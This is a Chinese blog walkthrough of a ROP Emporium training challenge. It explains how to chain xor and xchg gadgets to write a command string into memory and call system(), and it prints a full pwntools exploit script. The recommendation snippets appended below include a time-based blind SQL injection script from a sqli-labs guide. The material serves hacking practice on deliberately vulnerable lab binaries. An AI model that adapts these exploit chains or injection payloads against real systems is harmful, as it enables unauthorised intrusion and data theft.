ROPEmporium通关全解(六)

最新推荐文章于 2025-05-07 20:10:29 发布
最新推荐文章于 2025-05-07 20:10:29 发布
阅读量304 收藏 1
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yalecaltech/article/details/103679944
本文深入探讨了ROP(Return-oriented programming)技术,一种绕过现代操作系统防御的高级内存攻击手法。通过ROPEmporium平台的一系列挑战,逐步解析ROP利用技术,包括如何使用ropgadget工具,组合gadget以实现特定指令的执行,最终完成攻击目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言
1.关于ROP
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)
ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。
2. 本系列rop实战题目的背景
来自ROPEmporium
旨在通过解决一系列挑战来一步步进阶学习ROP利用技术。

操作

先看一下基本信息
在这里插入图片描述然后载入r2分析
在这里插入图片描述在这里插入图片描述分别看看pwnme和usefulFunction
在这里插入图片描述在这里插入图片描述可以看到这些结构和之前的关卡基本相同
那覆盖rsp所需的偏移量呢?
可以自己做一遍
这里直接给出答案,偏移量还是40字节
然后使用ropgadget找到有用的gadget
在这里插入图片描述
首先我们要找到一个gadget用于将字符串写入内存
mov适合的似乎只有下面这一条
在这里插入图片描述如果用了这一条,那么下一个要解决的问题就是怎么将值写入r10、r11寄存器呢
似乎没有可直接写的办法,这时候我们常用的解决办法就是组合多个gadget以将值写入r10为例,我们看看该如何操作
那么这里就需要注意了,按照前面的默认命令,其实ropgadget的搜索深度是10
在这里插入图片描述既然我们需要组合多个gadget,既然越多越多,所以我们可以加上—depth 20,将深度设为20
在这里插入图片描述首先清空r11,有两个办法,要么置零,要么与自身异或
我们看看gadget里有没有符合的
在这里插入图片描述找到了
接下来把地址pop到r12里
对应的gadget为
在这里插入图片描述前面r11已经是0了,我们将r12与r11异或,这样其实就相当于间接地使用了mov,将值写入了r11
对应的gadget为
在这里插入图片描述然后使用xchg交换r11和r10寄存器的值,这样就相当于将地址写到了r10寄存器中
这样就实现了我们的目的
做完这部分工作之后,我们只需pop rdi,ret,字符串的地址作为system()参数传入,再调用system()就可以了
完整代码在6.py

from pwn import *


def place_address(address):
    payload = p64(0x0000000000400822) # xor r11, r11; pop r14; mov edi, 0x601050; ret;
    payload += p64(0) # Unused pop r14
    payload += p64(0x0000000000400832) # pop r12; mov r13d, 0x604060; ret;
    payload += p64(address)
    payload += p64(0x000000000040082f) # xor r11, r12; pop r12; mov r13d, 0x604060; ret;
    payload += p64(0) # Unused pop r12
    payload += p64(0x0000000000400840) # xchg r11, r10; pop r15; mov r11d, 0x602050; ret;
    payload += p64(0) # Unused pop r15
    return payload

def place_data(data):
    payload = p64(0x0000000000400822) # xor r11, r11; pop r14; mov edi, 0x601050; ret;
    payload += p64(0) # Unused pop r14
    payload += p64(0x0000000000400832) # pop r12; mov r13d, 0x604060; ret;
    payload += data # String to be putted
    payload += p64(0x000000000040082f) # xor r11, r12; pop r12; mov r13d, 0x604060; ret;
    payload += p64(0) # Unused pop r12
    return payload

def write_data(string, address):
    while len(string) % 8 != 0:
          string += "\x00"

    splitted_string = [string[i:i + 8] for i in range(0, len(string), 8)]
    payload = ""

    for i in range(len(splitted_string)):
        # Put address into r10 register
        payload += place_address(address + (i * 8))

        # Now we have to put actual data in r11
        payload += place_data(splitted_string[i])

        # Write data to address
        payload += p64(0x000000000040084e) # mov qword ptr [r10], r11; pop r13; pop r12; xor byte ptr [r10], r12b; ret; 
        payload += p64(0) * 2 # Unused pop r13 and pop r12
         
    return payload

offset = cyclic(40)
offset += write_data("/bin/cat flag.txt", 0x601050)
offset += p64(0x00000000004008c3)
offset += p64(0x601050)
offset += p64(0x00400810)

print(offset)

运行如图

在这里插入图片描述

Elwood Ying
关注
小白详解rop emporium
BadRer的博客
08-02 2185
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
ROPEmporium通关全解(一)
Yale的博客
12-24 1160
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战目的背景 来自ROPEmporium 旨在通...
PWN基础-ROP技术-ret2syscall突破NX保护
最新发布
Welcome To Myon'Blog !
05-07 392
我们 ret2syscall 实际还是希望调用 execve,和 ret2shellcode 类似,只是多了堆栈不可执行。后面我们会继续发送内容(/bin/sh)给 read 函数,读取到 bss_addr。我们继续调用 execve,其 32 位系统调用号是 11,即 0xb。没有找到,因此我们后面需要手动将 /bin/sh 写到 bss 段。我们先系统调用 read,其 32 位系统调用号是 3,即 0x3。接下来我们找 /bin/sh 字符串的地址。32 位程序,小端序,开启了 NX 保护。
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 1073
暑假刷计划-0x00 水平有限,这些只是前面大部分目的WP,最后几道暂时没做 目来源:ROP Emporium 工具&&环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
ROPEmporium通关全解(四)
Yale的博客
12-24 453
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战目的背景 来自ROPEmporium...
ROPEmporium通关全解(二)
Yale的博客
12-24 457
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战目的背景 来自ROPEmporium 旨在通...
英语四级作文通关秘籍.docx
02-20
【英语四级作文通关秘籍】是针对中国大学生备考英语四级和级考试中写作部分的策略指导。英语四级考试是中国高校普遍认可的英语能力测试,其作文部分对于考生的语言综合运用能力有着较高的要求。以下是根据秘籍...
韩国通关号免费查询系统,韩国清关码校验
09-26
今天给大家带来的是韩国通关码反查纠错系统于2022年9月26日的升级内容介绍。 第一,系统以浏览器插件的形式呈现,后期将会一同发布网站系统。 第二,系统再次启用了批量通关码信息校验的功能,我们的老用户可能并...
高项32小时通关.pdf
06-24
知识点:软考高级项目管理师相关法律法规和标准 - 国内外项目管理标准和规范 - 软考高级项目管理师考试规范 - 相关法律法规对项目管理的影响 - IT项目管理中的合规性和伦理 知识点七:信息技术发展对项目管理的...
WebGoat通关详解.zip
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问,从基础到高级,...
系统架构设计师考试32小时通关.pdf
05-29
系统架构设计师考试32小时通关.pdf。该书2018年出版,作者:薛大龙,李海龙,吴芳茜,邹月平,黄俊玲 著。51CTO学院的书。考系统架构设计师的可以拿去参考
ROPEmporium通关全解(五)
Yale的博客
12-24 443
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战目的背景 来自ROPEmporium...
ROP Emporium x86_64 7~8
CoLin的pwn小屋
04-21 473
ROP Emporium x64 7-8
ROP Emporium x86_64 1~6
CoLin的pwn小屋
04-09 3394
ROP Emporium x64 1-6
基本ROPROPgadget
qq_62539372的博客
04-02 1053
把对应获取 shell 的系统调用的参数放到对应的寄存器中,那么我们在执行 int 0x80 就可执行对应的系统调用。例: bamboofox 中的 ret2syscall。检查保护机制 堆栈不可执行 随机地址没开。获得 /bin/sh 字符串对应的地址。寻找控制 ebx 的gadgets。寻找控制 eax 的gadgets。利用gadgets获得shell。bx bin/sh的地址。int 80 的地址。
深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 2060
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
ROPgadget使用
Jingged的博客
04-09 2291
需要注意的是,ROPgadget只是工具的一部分,成功的ROP攻击还需要深入理解目标二进制文件的结构和行为,以及攻击场景的具体细节。此外,随着软件安全性的提高和漏洞修复的不断进行,可用的gadgets可能会变得越来越少,因此在使用ROPgadget时,最好与其他工具和技术结合起来进行更全面的分析和利用开发。ROPgadget是一种基于代码复用技术的攻击工具,它可以帮助攻击者在二进制文件中找到可利用的代码片段(即ROP链中的gadgets),从而构建出有效的攻击载荷。是你想要分析的二进制文件的路径,
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1309
PWN
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
热门推荐
半岛铁盒的博客
03-10 2万+
一. 介 绍 使用此工具,您可以在二进制文件中搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
sqli-labs通关全解
04-27
### 关于 SQLi-Labs 的全面解决方案 SQLi-Labs 是一款经典的 Web 安全学习工具,主要用于练习和掌握 SQL 注入技术。以下是针对 SQLi-Labs 靶场的全部关卡解决方案概述。 #### 一、基础环境搭建 在开始解决各个关卡之前,需要确保靶场已成功部署并运行正常。可以通过以下方式完成安装: - 下载 SQLi-Labs 源码包,并将其放置到本地服务器的 `www` 或者 `htdocs` 文件夹下。 - 启动 Apache 和 MySQL 服务后,在浏览器中输入地址 `http://127.0.0.1/` 访问站点[^2]。 如果遇到权限问或者无法创建临时文件的情况,则需调整目标目录的读写权限设置[^3]。 #### 二、各关卡解析思路概览 ##### Less-1 到 Less-4 这些初级目主要考察基本的手工注入技巧以及如何利用单引号闭合查询条件来绕过验证机制。例如,在第32关里提到的方法同样适用于此阶段——即尝试向参数附加特殊字符如 `%df`,进而观察返回结果的变化情况从而推测内部逻辑结构[^1]。 ##### 中级挑战 (Less-5 至 Less-16) 随着难度增加,中级部分引入了更多复杂的场景比如时间延迟型盲注(Time-based Blind Injection),布尔型盲注(Boolean-based Blind Injection)等概念。对于这类问通常采用如下策略: ###### 时间基线测试法 当面对不可见反馈信息时,可通过构造特定payload让数据库执行耗时操作以间接获知某些细节。举个例子来说就是下面这个Python脚本片段展示了如何去探测当前使用的DBMS版本号的一部分内容: ```python import time import requests def get_db_version(): version = "" index = 1 while True: found_char = False for char_code in range(33, 126): # ASCII printable characters payload = f"' OR IF(SUBSTRING(@@version,{index},1)=CHAR({char_code}),SLEEP(5),NULL)-- " start_time = time.time() try: res = requests.get(f"http://target-site.com/vulnerable-page?id={payload}") elapsed_time = time.time() - start_time if elapsed_time >= 5: version += chr(char_code) print(f"[+] Found character: {chr(char_code)}") index += 1 found_char = True break except Exception as e: pass if not found_char: break return version print(get_db_version()) ``` 上述代码通过不断改变SUBSTRING函数中的位置索引来逐字提取数据表的名字或者其他敏感资料[^4]。 ##### 高阶难 (Beyond Level 16) 更高层次的任务往往涉及到联合查询 UNION SELECT ,堆叠式多条命令 Stacked Queries 及其他高级手法的应用场合。此时除了要具备扎实的基础理论功底之外还需要灵活运用各种编程语言编写自动化攻击程序辅助分析过程。 --- ### 注意事项 尽管本文提供了大量实用的技术指导方针,但在实际动手实践过程中仍需注意安全伦理规范,仅限于授权范围内的渗透测试活动之中应用所学知识技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值